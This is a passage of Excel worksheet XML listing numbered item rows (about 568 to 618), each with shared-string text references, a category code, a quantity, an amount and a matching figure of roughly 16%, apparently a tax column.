        <v>2</v>
      </c>
      <c r="I540" s="14">
        <v>2735.04</v>
      </c>
      <c r="J540" s="15">
        <v>437.6064</v>
      </c>
      <c r="K540" s="16"/>
    </row>
    <row r="541" spans="2:11">
      <c r="B541" s="9">
        <v>568</v>
      </c>
      <c r="C541" s="238" t="s">
        <v>6061</v>
      </c>
      <c r="D541" s="238" t="s">
        <v>6062</v>
      </c>
      <c r="E541" s="238" t="s">
        <v>5930</v>
      </c>
      <c r="F541" s="238" t="s">
        <v>6063</v>
      </c>
      <c r="G541" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H541" s="10">
        <v>3</v>
      </c>
      <c r="I541" s="14">
        <v>1779.91</v>
      </c>
      <c r="J541" s="15">
        <v>284.784</v>
      </c>
      <c r="K541" s="16"/>
    </row>
    <row r="542" spans="2:11">
      <c r="B542" s="9">
        <v>569</v>
      </c>
      <c r="C542" s="238" t="s">
        <v>6064</v>
      </c>
      <c r="D542" s="238" t="s">
        <v>6065</v>
      </c>
      <c r="E542" s="238" t="s">
        <v>6066</v>
      </c>
      <c r="F542" s="9"/>
      <c r="G542" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H542" s="10">
        <v>2</v>
      </c>
      <c r="I542" s="14">
        <v>1452.99</v>
      </c>
      <c r="J542" s="15">
        <v>232.48</v>
      </c>
      <c r="K542" s="16"/>
    </row>
    <row r="543" spans="2:11">
      <c r="B543" s="9">
        <v>570</v>
      </c>
      <c r="C543" s="238" t="s">
        <v>6067</v>
      </c>
      <c r="D543" s="238" t="s">
        <v>6068</v>
      </c>
      <c r="E543" s="238" t="s">
        <v>6069</v>
      </c>
      <c r="F543" s="9"/>
      <c r="G543" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H543" s="10">
        <v>4</v>
      </c>
      <c r="I543" s="14">
        <v>10.26</v>
      </c>
      <c r="J543" s="15">
        <v>1.6448</v>
      </c>
      <c r="K543" s="16"/>
    </row>
    <row r="544" spans="2:11">
      <c r="B544" s="9">
        <v>571</v>
      </c>
      <c r="C544" s="238" t="s">
        <v>6070</v>
      </c>
      <c r="D544" s="238" t="s">
        <v>6071</v>
      </c>
      <c r="E544" s="238" t="s">
        <v>6072</v>
      </c>
      <c r="F544" s="238" t="s">
        <v>6073</v>
      </c>
      <c r="G544" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H544" s="10">
        <v>1</v>
      </c>
      <c r="I544" s="14">
        <v>5256.41</v>
      </c>
      <c r="J544" s="15">
        <v>841.0256</v>
      </c>
      <c r="K544" s="16"/>
    </row>
    <row r="545" spans="2:11">
      <c r="B545" s="9">
        <v>572</v>
      </c>
      <c r="C545" s="238" t="s">
        <v>6074</v>
      </c>
      <c r="D545" s="9"/>
      <c r="E545" s="238" t="s">
        <v>6075</v>
      </c>
      <c r="F545" s="238" t="s">
        <v>6076</v>
      </c>
      <c r="G545" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H545" s="10">
        <v>1</v>
      </c>
      <c r="I545" s="14">
        <v>5042.74</v>
      </c>
      <c r="J545" s="15">
        <v>806.8384</v>
      </c>
      <c r="K545" s="16"/>
    </row>
    <row r="546" spans="2:11">
      <c r="B546" s="9">
        <v>573</v>
      </c>
      <c r="C546" s="238" t="s">
        <v>6077</v>
      </c>
      <c r="D546" s="238" t="s">
        <v>6078</v>
      </c>
      <c r="E546" s="238" t="s">
        <v>5803</v>
      </c>
      <c r="F546" s="238" t="s">
        <v>6079</v>
      </c>
      <c r="G546" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H546" s="10">
        <v>3</v>
      </c>
      <c r="I546" s="14">
        <v>1501.42</v>
      </c>
      <c r="J546" s="15">
        <v>240.2256</v>
      </c>
      <c r="K546" s="16"/>
    </row>
    <row r="547" spans="2:11">
      <c r="B547" s="9">
        <v>574</v>
      </c>
      <c r="C547" s="238" t="s">
        <v>6080</v>
      </c>
      <c r="D547" s="238" t="s">
        <v>5983</v>
      </c>
      <c r="E547" s="238" t="s">
        <v>5984</v>
      </c>
      <c r="F547" s="238" t="s">
        <v>6081</v>
      </c>
      <c r="G547" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H547" s="10">
        <v>1</v>
      </c>
      <c r="I547" s="14">
        <v>1452.99</v>
      </c>
      <c r="J547" s="15">
        <v>232.4784</v>
      </c>
      <c r="K547" s="16"/>
    </row>
    <row r="548" spans="2:11">
      <c r="B548" s="9">
        <v>575</v>
      </c>
      <c r="C548" s="238" t="s">
        <v>6082</v>
      </c>
      <c r="D548" s="9"/>
      <c r="E548" s="238" t="s">
        <v>5810</v>
      </c>
      <c r="F548" s="9"/>
      <c r="G548" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H548" s="10">
        <v>7</v>
      </c>
      <c r="I548" s="14">
        <v>1897.61</v>
      </c>
      <c r="J548" s="15">
        <v>303.6208</v>
      </c>
      <c r="K548" s="16"/>
    </row>
    <row r="549" spans="2:11">
      <c r="B549" s="9">
        <v>576</v>
      </c>
      <c r="C549" s="238" t="s">
        <v>6083</v>
      </c>
      <c r="D549" s="238" t="s">
        <v>6084</v>
      </c>
      <c r="E549" s="238" t="s">
        <v>6085</v>
      </c>
      <c r="F549" s="9"/>
      <c r="G549" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H549" s="10">
        <v>100</v>
      </c>
      <c r="I549" s="14">
        <v>9793.14</v>
      </c>
      <c r="J549" s="15">
        <v>1566.88</v>
      </c>
      <c r="K549" s="16"/>
    </row>
    <row r="550" spans="2:11">
      <c r="B550" s="9">
        <v>577</v>
      </c>
      <c r="C550" s="238" t="s">
        <v>6086</v>
      </c>
      <c r="D550" s="9"/>
      <c r="E550" s="238" t="s">
        <v>6085</v>
      </c>
      <c r="F550" s="238" t="s">
        <v>6087</v>
      </c>
      <c r="G550" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H550" s="10">
        <v>11</v>
      </c>
      <c r="I550" s="14">
        <v>1410.26</v>
      </c>
      <c r="J550" s="15">
        <v>225.6496</v>
      </c>
      <c r="K550" s="16"/>
    </row>
    <row r="551" spans="2:11">
      <c r="B551" s="9">
        <v>578</v>
      </c>
      <c r="C551" s="238" t="s">
        <v>6088</v>
      </c>
      <c r="D551" s="238" t="s">
        <v>6089</v>
      </c>
      <c r="E551" s="238" t="s">
        <v>6090</v>
      </c>
      <c r="F551" s="238" t="s">
        <v>6091</v>
      </c>
      <c r="G551" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H551" s="10">
        <v>2</v>
      </c>
      <c r="I551" s="14">
        <v>341.88</v>
      </c>
      <c r="J551" s="15">
        <v>54.7008</v>
      </c>
      <c r="K551" s="16"/>
    </row>
    <row r="552" spans="2:11">
      <c r="B552" s="9">
        <v>579</v>
      </c>
      <c r="C552" s="238" t="s">
        <v>6092</v>
      </c>
      <c r="D552" s="238" t="s">
        <v>6093</v>
      </c>
      <c r="E552" s="238" t="s">
        <v>6094</v>
      </c>
      <c r="F552" s="238" t="s">
        <v>6095</v>
      </c>
      <c r="G552" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H552" s="10">
        <v>17</v>
      </c>
      <c r="I552" s="14">
        <v>7145.29</v>
      </c>
      <c r="J552" s="15">
        <v>1143.2432</v>
      </c>
      <c r="K552" s="16"/>
    </row>
    <row r="553" spans="2:11">
      <c r="B553" s="9">
        <v>580</v>
      </c>
      <c r="C553" s="238" t="s">
        <v>6096</v>
      </c>
      <c r="D553" s="238" t="s">
        <v>6097</v>
      </c>
      <c r="E553" s="238" t="s">
        <v>6098</v>
      </c>
      <c r="F553" s="238" t="s">
        <v>6099</v>
      </c>
      <c r="G553" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H553" s="10">
        <v>18</v>
      </c>
      <c r="I553" s="14">
        <v>16163.38</v>
      </c>
      <c r="J553" s="15">
        <v>2586.1536</v>
      </c>
      <c r="K553" s="16"/>
    </row>
    <row r="554" spans="2:11">
      <c r="B554" s="9">
        <v>581</v>
      </c>
      <c r="C554" s="238" t="s">
        <v>6100</v>
      </c>
      <c r="D554" s="238" t="s">
        <v>6101</v>
      </c>
      <c r="E554" s="238" t="s">
        <v>6102</v>
      </c>
      <c r="F554" s="238" t="s">
        <v>6103</v>
      </c>
      <c r="G554" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H554" s="10">
        <v>2</v>
      </c>
      <c r="I554" s="14">
        <v>3076.92</v>
      </c>
      <c r="J554" s="15">
        <v>492.3072</v>
      </c>
      <c r="K554" s="16"/>
    </row>
    <row r="555" spans="2:11">
      <c r="B555" s="9">
        <v>582</v>
      </c>
      <c r="C555" s="238" t="s">
        <v>6104</v>
      </c>
      <c r="D555" s="238" t="s">
        <v>6105</v>
      </c>
      <c r="E555" s="238" t="s">
        <v>6106</v>
      </c>
      <c r="F555" s="9"/>
      <c r="G555" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H555" s="10">
        <v>1</v>
      </c>
      <c r="I555" s="14">
        <v>555.55</v>
      </c>
      <c r="J555" s="15">
        <v>88.888</v>
      </c>
      <c r="K555" s="16"/>
    </row>
    <row r="556" spans="2:11">
      <c r="B556" s="9">
        <v>583</v>
      </c>
      <c r="C556" s="238" t="s">
        <v>6107</v>
      </c>
      <c r="D556" s="238" t="s">
        <v>6108</v>
      </c>
      <c r="E556" s="238" t="s">
        <v>6109</v>
      </c>
      <c r="F556" s="9"/>
      <c r="G556" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H556" s="10">
        <v>109</v>
      </c>
      <c r="I556" s="14">
        <v>5857.13</v>
      </c>
      <c r="J556" s="15">
        <v>937.2256</v>
      </c>
      <c r="K556" s="16"/>
    </row>
    <row r="557" spans="2:11">
      <c r="B557" s="9">
        <v>584</v>
      </c>
      <c r="C557" s="238" t="s">
        <v>6110</v>
      </c>
      <c r="D557" s="238" t="s">
        <v>6111</v>
      </c>
      <c r="E557" s="238" t="s">
        <v>6112</v>
      </c>
      <c r="F557" s="9"/>
      <c r="G557" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H557" s="10">
        <v>12</v>
      </c>
      <c r="I557" s="14">
        <v>2642.26</v>
      </c>
      <c r="J557" s="15">
        <v>422.7648</v>
      </c>
      <c r="K557" s="16"/>
    </row>
    <row r="558" spans="2:11">
      <c r="B558" s="9">
        <v>585</v>
      </c>
      <c r="C558" s="238" t="s">
        <v>6113</v>
      </c>
      <c r="D558" s="238" t="s">
        <v>6114</v>
      </c>
      <c r="E558" s="238" t="s">
        <v>6115</v>
      </c>
      <c r="F558" s="238" t="s">
        <v>6116</v>
      </c>
      <c r="G558" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H558" s="10">
        <v>20</v>
      </c>
      <c r="I558" s="14">
        <v>4444.44</v>
      </c>
      <c r="J558" s="15">
        <v>711.104</v>
      </c>
      <c r="K558" s="16"/>
    </row>
    <row r="559" spans="2:11">
      <c r="B559" s="9">
        <v>586</v>
      </c>
      <c r="C559" s="238" t="s">
        <v>6117</v>
      </c>
      <c r="D559" s="238" t="s">
        <v>5955</v>
      </c>
      <c r="E559" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F559" s="9"/>
      <c r="G559" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H559" s="10">
        <v>3</v>
      </c>
      <c r="I559" s="14">
        <v>3068.38</v>
      </c>
      <c r="J559" s="15">
        <v>490.9392</v>
      </c>
      <c r="K559" s="16"/>
    </row>
    <row r="560" spans="2:11">
      <c r="B560" s="9">
        <v>587</v>
      </c>
      <c r="C560" s="238" t="s">
        <v>6118</v>
      </c>
      <c r="D560" s="9"/>
      <c r="E560" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F560" s="238" t="s">
        <v>6119</v>
      </c>
      <c r="G560" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H560" s="10">
        <v>1</v>
      </c>
      <c r="I560" s="14">
        <v>4102.56</v>
      </c>
      <c r="J560" s="15">
        <v>656.4096</v>
      </c>
      <c r="K560" s="16"/>
    </row>
    <row r="561" spans="2:11">
      <c r="B561" s="9">
        <v>588</v>
      </c>
      <c r="C561" s="238" t="s">
        <v>6120</v>
      </c>
      <c r="D561" s="9"/>
      <c r="E561" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F561" s="238" t="s">
        <v>6121</v>
      </c>
      <c r="G561" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H561" s="10">
        <v>1</v>
      </c>
      <c r="I561" s="14">
        <v>1410.26</v>
      </c>
      <c r="J561" s="15">
        <v>225.6416</v>
      </c>
      <c r="K561" s="16"/>
    </row>
    <row r="562" spans="2:11">
      <c r="B562" s="9">
        <v>589</v>
      </c>
      <c r="C562" s="238" t="s">
        <v>6122</v>
      </c>
      <c r="D562" s="9"/>
      <c r="E562" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F562" s="238" t="s">
        <v>6123</v>
      </c>
      <c r="G562" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H562" s="10">
        <v>1</v>
      </c>
      <c r="I562" s="14">
        <v>3076.92</v>
      </c>
      <c r="J562" s="15">
        <v>492.3072</v>
      </c>
      <c r="K562" s="16"/>
    </row>
    <row r="563" spans="2:11">
      <c r="B563" s="9">
        <v>590</v>
      </c>
      <c r="C563" s="238" t="s">
        <v>6124</v>
      </c>
      <c r="D563" s="9"/>
      <c r="E563" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F563" s="238" t="s">
        <v>6125</v>
      </c>
      <c r="G563" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H563" s="10">
        <v>1</v>
      </c>
      <c r="I563" s="14">
        <v>1538.46</v>
      </c>
      <c r="J563" s="15">
        <v>246.1536</v>
      </c>
      <c r="K563" s="16"/>
    </row>
    <row r="564" spans="2:11">
      <c r="B564" s="9">
        <v>591</v>
      </c>
      <c r="C564" s="238" t="s">
        <v>6126</v>
      </c>
      <c r="D564" s="9"/>
      <c r="E564" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F564" s="238" t="s">
        <v>6127</v>
      </c>
      <c r="G564" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H564" s="10">
        <v>2</v>
      </c>
      <c r="I564" s="14">
        <v>11282.04</v>
      </c>
      <c r="J564" s="15">
        <v>1805.1264</v>
      </c>
      <c r="K564" s="16"/>
    </row>
    <row r="565" spans="2:11">
      <c r="B565" s="9">
        <v>592</v>
      </c>
      <c r="C565" s="238" t="s">
        <v>6128</v>
      </c>
      <c r="D565" s="238" t="s">
        <v>6129</v>
      </c>
      <c r="E565" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F565" s="238" t="s">
        <v>6130</v>
      </c>
      <c r="G565" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H565" s="10">
        <v>1</v>
      </c>
      <c r="I565" s="14">
        <v>1239.32</v>
      </c>
      <c r="J565" s="15">
        <v>198.2912</v>
      </c>
      <c r="K565" s="16"/>
    </row>
    <row r="566" spans="2:11">
      <c r="B566" s="9">
        <v>593</v>
      </c>
      <c r="C566" s="238" t="s">
        <v>6131</v>
      </c>
      <c r="D566" s="238" t="s">
        <v>6132</v>
      </c>
      <c r="E566" s="238" t="s">
        <v>6133</v>
      </c>
      <c r="F566" s="9"/>
      <c r="G566" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H566" s="10">
        <v>10</v>
      </c>
      <c r="I566" s="14">
        <v>81.2</v>
      </c>
      <c r="J566" s="15">
        <v>12.992</v>
      </c>
      <c r="K566" s="16"/>
    </row>
    <row r="567" spans="2:11">
      <c r="B567" s="9">
        <v>594</v>
      </c>
      <c r="C567" s="238" t="s">
        <v>6134</v>
      </c>
      <c r="D567" s="238" t="s">
        <v>6135</v>
      </c>
      <c r="E567" s="238" t="s">
        <v>6136</v>
      </c>
      <c r="F567" s="9"/>
      <c r="G567" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H567" s="10">
        <v>20</v>
      </c>
      <c r="I567" s="14">
        <v>4111.11</v>
      </c>
      <c r="J567" s="15">
        <v>657.792</v>
      </c>
      <c r="K567" s="16"/>
    </row>
    <row r="568" spans="2:11">
      <c r="B568" s="9">
        <v>595</v>
      </c>
      <c r="C568" s="238" t="s">
        <v>6137</v>
      </c>
      <c r="D568" s="238" t="s">
        <v>6138</v>
      </c>
      <c r="E568" s="238" t="s">
        <v>6139</v>
      </c>
      <c r="F568" s="238" t="s">
        <v>6140</v>
      </c>
      <c r="G568" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H568" s="10">
        <v>17</v>
      </c>
      <c r="I568" s="14">
        <v>9452.93</v>
      </c>
      <c r="J568" s="15">
        <v>1512.456</v>
      </c>
      <c r="K568" s="16"/>
    </row>
    <row r="569" spans="2:11">
      <c r="B569" s="9">
        <v>596</v>
      </c>
      <c r="C569" s="238" t="s">
        <v>6141</v>
      </c>
      <c r="D569" s="238" t="s">
        <v>6142</v>
      </c>
      <c r="E569" s="238" t="s">
        <v>6143</v>
      </c>
      <c r="F569" s="238" t="s">
        <v>6144</v>
      </c>
      <c r="G569" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H569" s="10">
        <v>5</v>
      </c>
      <c r="I569" s="14">
        <v>77.25</v>
      </c>
      <c r="J569" s="15">
        <v>12.36</v>
      </c>
      <c r="K569" s="16"/>
    </row>
    <row r="570" spans="2:11">
      <c r="B570" s="9">
        <v>597</v>
      </c>
      <c r="C570" s="238" t="s">
        <v>6145</v>
      </c>
      <c r="D570" s="238" t="s">
        <v>6146</v>
      </c>
      <c r="E570" s="238" t="s">
        <v>2009</v>
      </c>
      <c r="F570" s="238" t="s">
        <v>6147</v>
      </c>
      <c r="G570" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H570" s="10">
        <v>1</v>
      </c>
      <c r="I570" s="14">
        <v>3418.8</v>
      </c>
      <c r="J570" s="15">
        <v>547.008</v>
      </c>
      <c r="K570" s="16"/>
    </row>
    <row r="571" spans="2:11">
      <c r="B571" s="9">
        <v>598</v>
      </c>
      <c r="C571" s="238" t="s">
        <v>6148</v>
      </c>
      <c r="D571" s="9"/>
      <c r="E571" s="238" t="s">
        <v>6149</v>
      </c>
      <c r="F571" s="9"/>
      <c r="G571" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H571" s="10">
        <v>2</v>
      </c>
      <c r="I571" s="14">
        <v>205.12</v>
      </c>
      <c r="J571" s="15">
        <v>32.8192</v>
      </c>
      <c r="K571" s="16"/>
    </row>
    <row r="572" spans="2:11">
      <c r="B572" s="9">
        <v>599</v>
      </c>
      <c r="C572" s="238" t="s">
        <v>6150</v>
      </c>
      <c r="D572" s="238" t="s">
        <v>6151</v>
      </c>
      <c r="E572" s="238" t="s">
        <v>6152</v>
      </c>
      <c r="F572" s="9"/>
      <c r="G572" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H572" s="10">
        <v>13</v>
      </c>
      <c r="I572" s="14">
        <v>6899.58</v>
      </c>
      <c r="J572" s="15">
        <v>1103.9392</v>
      </c>
      <c r="K572" s="16"/>
    </row>
    <row r="573" spans="2:11">
      <c r="B573" s="9">
        <v>600</v>
      </c>
      <c r="C573" s="238" t="s">
        <v>6153</v>
      </c>
      <c r="D573" s="238" t="s">
        <v>6154</v>
      </c>
      <c r="E573" s="238" t="s">
        <v>6155</v>
      </c>
      <c r="F573" s="9"/>
      <c r="G573" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H573" s="10">
        <v>1</v>
      </c>
      <c r="I573" s="14">
        <v>5427.84</v>
      </c>
      <c r="J573" s="15">
        <v>868.4544</v>
      </c>
      <c r="K573" s="16"/>
    </row>
    <row r="574" spans="2:11">
      <c r="B574" s="9">
        <v>601</v>
      </c>
      <c r="C574" s="238" t="s">
        <v>6156</v>
      </c>
      <c r="D574" s="9"/>
      <c r="E574" s="238" t="s">
        <v>6157</v>
      </c>
      <c r="F574" s="238" t="s">
        <v>6158</v>
      </c>
      <c r="G574" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H574" s="10">
        <v>1</v>
      </c>
      <c r="I574" s="14">
        <v>500</v>
      </c>
      <c r="J574" s="15">
        <v>80</v>
      </c>
      <c r="K574" s="16"/>
    </row>
    <row r="575" spans="2:11">
      <c r="B575" s="9">
        <v>602</v>
      </c>
      <c r="C575" s="238" t="s">
        <v>6159</v>
      </c>
      <c r="D575" s="238" t="s">
        <v>6160</v>
      </c>
      <c r="E575" s="238" t="s">
        <v>6161</v>
      </c>
      <c r="F575" s="9"/>
      <c r="G575" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H575" s="10">
        <v>4</v>
      </c>
      <c r="I575" s="14">
        <v>1955.55</v>
      </c>
      <c r="J575" s="15">
        <v>312.8896</v>
      </c>
      <c r="K575" s="16"/>
    </row>
    <row r="576" spans="2:11">
      <c r="B576" s="9">
        <v>603</v>
      </c>
      <c r="C576" s="238" t="s">
        <v>6162</v>
      </c>
      <c r="D576" s="9"/>
      <c r="E576" s="238" t="s">
        <v>6039</v>
      </c>
      <c r="F576" s="238" t="s">
        <v>6163</v>
      </c>
      <c r="G576" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H576" s="10">
        <v>2</v>
      </c>
      <c r="I576" s="14">
        <v>1282.05</v>
      </c>
      <c r="J576" s="15">
        <v>205.1296</v>
      </c>
      <c r="K576" s="16"/>
    </row>
    <row r="577" spans="2:11">
      <c r="B577" s="9">
        <v>604</v>
      </c>
      <c r="C577" s="238" t="s">
        <v>6164</v>
      </c>
      <c r="D577" s="238" t="s">
        <v>5825</v>
      </c>
      <c r="E577" s="238" t="s">
        <v>6165</v>
      </c>
      <c r="F577" s="238" t="s">
        <v>6166</v>
      </c>
      <c r="G577" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H577" s="10">
        <v>1</v>
      </c>
      <c r="I577" s="14">
        <v>598.29</v>
      </c>
      <c r="J577" s="15">
        <v>95.7264</v>
      </c>
      <c r="K577" s="16"/>
    </row>
    <row r="578" spans="2:11">
      <c r="B578" s="9">
        <v>605</v>
      </c>
      <c r="C578" s="238" t="s">
        <v>6167</v>
      </c>
      <c r="D578" s="238" t="s">
        <v>5900</v>
      </c>
      <c r="E578" s="238" t="s">
        <v>5901</v>
      </c>
      <c r="F578" s="9"/>
      <c r="G578" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H578" s="10">
        <v>13</v>
      </c>
      <c r="I578" s="14">
        <v>577.24</v>
      </c>
      <c r="J578" s="15">
        <v>92.352</v>
      </c>
      <c r="K578" s="16"/>
    </row>
    <row r="579" spans="2:11">
      <c r="B579" s="9">
        <v>606</v>
      </c>
      <c r="C579" s="238" t="s">
        <v>6168</v>
      </c>
      <c r="D579" s="238" t="s">
        <v>6169</v>
      </c>
      <c r="E579" s="238" t="s">
        <v>6170</v>
      </c>
      <c r="F579" s="238" t="s">
        <v>6171</v>
      </c>
      <c r="G579" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H579" s="10">
        <v>10</v>
      </c>
      <c r="I579" s="14">
        <v>6272.95</v>
      </c>
      <c r="J579" s="15">
        <v>1003.68</v>
      </c>
      <c r="K579" s="16"/>
    </row>
    <row r="580" spans="2:11">
      <c r="B580" s="9">
        <v>607</v>
      </c>
      <c r="C580" s="238" t="s">
        <v>6172</v>
      </c>
      <c r="D580" s="238" t="s">
        <v>5481</v>
      </c>
      <c r="E580" s="238" t="s">
        <v>6173</v>
      </c>
      <c r="F580" s="238" t="s">
        <v>6174</v>
      </c>
      <c r="G580" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H580" s="10">
        <v>95</v>
      </c>
      <c r="I580" s="14">
        <v>378.62</v>
      </c>
      <c r="J580" s="15">
        <v>60.648</v>
      </c>
      <c r="K580" s="16"/>
    </row>
    <row r="581" spans="2:11">
      <c r="B581" s="9">
        <v>608</v>
      </c>
      <c r="C581" s="238" t="s">
        <v>6175</v>
      </c>
      <c r="D581" s="9"/>
      <c r="E581" s="238" t="s">
        <v>6176</v>
      </c>
      <c r="F581" s="9"/>
      <c r="G581" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H581" s="10">
        <v>174</v>
      </c>
      <c r="I581" s="14">
        <v>4238.28</v>
      </c>
      <c r="J581" s="15">
        <v>678.1824</v>
      </c>
      <c r="K581" s="16"/>
    </row>
    <row r="582" spans="2:11">
      <c r="B582" s="9">
        <v>609</v>
      </c>
      <c r="C582" s="238" t="s">
        <v>6177</v>
      </c>
      <c r="D582" s="238" t="s">
        <v>6178</v>
      </c>
      <c r="E582" s="238" t="s">
        <v>2028</v>
      </c>
      <c r="F582" s="9"/>
      <c r="G582" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H582" s="10">
        <v>2</v>
      </c>
      <c r="I582" s="14">
        <v>9601.13</v>
      </c>
      <c r="J582" s="15">
        <v>1536.1824</v>
      </c>
      <c r="K582" s="16"/>
    </row>
    <row r="583" spans="2:11">
      <c r="B583" s="9">
        <v>610</v>
      </c>
      <c r="C583" s="238" t="s">
        <v>6179</v>
      </c>
      <c r="D583" s="238" t="s">
        <v>6178</v>
      </c>
      <c r="E583" s="238" t="s">
        <v>2028</v>
      </c>
      <c r="F583" s="238" t="s">
        <v>6180</v>
      </c>
      <c r="G583" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H583" s="10">
        <v>2</v>
      </c>
      <c r="I583" s="14">
        <v>8167.15</v>
      </c>
      <c r="J583" s="15">
        <v>1306.7456</v>
      </c>
      <c r="K583" s="16"/>
    </row>
    <row r="584" spans="2:11">
      <c r="B584" s="9">
        <v>611</v>
      </c>
      <c r="C584" s="238" t="s">
        <v>6181</v>
      </c>
      <c r="D584" s="238" t="s">
        <v>6182</v>
      </c>
      <c r="E584" s="238" t="s">
        <v>6183</v>
      </c>
      <c r="F584" s="238" t="s">
        <v>6184</v>
      </c>
      <c r="G584" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H584" s="10">
        <v>39</v>
      </c>
      <c r="I584" s="14">
        <v>33333.37</v>
      </c>
      <c r="J584" s="15">
        <v>5333.328</v>
      </c>
      <c r="K584" s="16"/>
    </row>
    <row r="585" spans="2:11">
      <c r="B585" s="9">
        <v>612</v>
      </c>
      <c r="C585" s="238" t="s">
        <v>6185</v>
      </c>
      <c r="D585" s="9"/>
      <c r="E585" s="238" t="s">
        <v>6183</v>
      </c>
      <c r="F585" s="238" t="s">
        <v>6186</v>
      </c>
      <c r="G585" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H585" s="10">
        <v>2</v>
      </c>
      <c r="I585" s="14">
        <v>1880.34</v>
      </c>
      <c r="J585" s="15">
        <v>300.8544</v>
      </c>
      <c r="K585" s="16"/>
    </row>
    <row r="586" spans="2:11">
      <c r="B586" s="9">
        <v>613</v>
      </c>
      <c r="C586" s="238" t="s">
        <v>6187</v>
      </c>
      <c r="D586" s="9"/>
      <c r="E586" s="238" t="s">
        <v>6188</v>
      </c>
      <c r="F586" s="9"/>
      <c r="G586" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H586" s="10">
        <v>1</v>
      </c>
      <c r="I586" s="14">
        <v>1538.46</v>
      </c>
      <c r="J586" s="15">
        <v>246.1536</v>
      </c>
      <c r="K586" s="16"/>
    </row>
    <row r="587" spans="2:11">
      <c r="B587" s="9">
        <v>614</v>
      </c>
      <c r="C587" s="238" t="s">
        <v>6189</v>
      </c>
      <c r="D587" s="9"/>
      <c r="E587" s="238" t="s">
        <v>2138</v>
      </c>
      <c r="F587" s="9"/>
      <c r="G587" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H587" s="10">
        <v>1</v>
      </c>
      <c r="I587" s="14">
        <v>598.29</v>
      </c>
      <c r="J587" s="15">
        <v>95.7264</v>
      </c>
      <c r="K587" s="16"/>
    </row>
    <row r="588" spans="2:11">
      <c r="B588" s="9">
        <v>615</v>
      </c>
      <c r="C588" s="238" t="s">
        <v>6190</v>
      </c>
      <c r="D588" s="238" t="s">
        <v>6191</v>
      </c>
      <c r="E588" s="238" t="s">
        <v>6192</v>
      </c>
      <c r="F588" s="9"/>
      <c r="G588" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H588" s="10">
        <v>5</v>
      </c>
      <c r="I588" s="14">
        <v>2015.68</v>
      </c>
      <c r="J588" s="15">
        <v>322.512</v>
      </c>
      <c r="K588" s="16"/>
    </row>
    <row r="589" spans="2:11">
      <c r="B589" s="9">
        <v>616</v>
      </c>
      <c r="C589" s="238" t="s">
        <v>6193</v>
      </c>
      <c r="D589" s="238" t="s">
        <v>6194</v>
      </c>
      <c r="E589" s="238" t="s">
        <v>6192</v>
      </c>
      <c r="F589" s="238" t="s">
        <v>6195</v>
      </c>
      <c r="G589" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H589" s="10">
        <v>1</v>
      </c>
      <c r="I589" s="14">
        <v>404.55</v>
      </c>
      <c r="J589" s="15">
        <v>64.728</v>
      </c>
      <c r="K589" s="16"/>
    </row>
    <row r="590" spans="2:11">
      <c r="B590" s="9">
        <v>617</v>
      </c>
      <c r="C590" s="238" t="s">
        <v>6196</v>
      </c>
      <c r="D590" s="238" t="s">
        <v>6197</v>
      </c>
      <c r="E590" s="238" t="s">
        <v>6198</v>
      </c>
      <c r="F590" s="238" t="s">
        <v>6199</v>
      </c>
      <c r="G590" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H590" s="10">
        <v>1</v>
      </c>
      <c r="I590" s="14">
        <v>297</v>
      </c>
      <c r="J590" s="15">
        <v>47.52</v>
      </c>
      <c r="K590" s="16"/>
    </row>
    <row r="591" spans="2:11">
      <c r="B591" s="9">
        <v>618</v>
      </c>
      <c r="C591" s="238" t="s">
        <v>6200</v>
      </c>
      <c r="D591" s="9"/>
      <c r="E591" s="238" t="s">
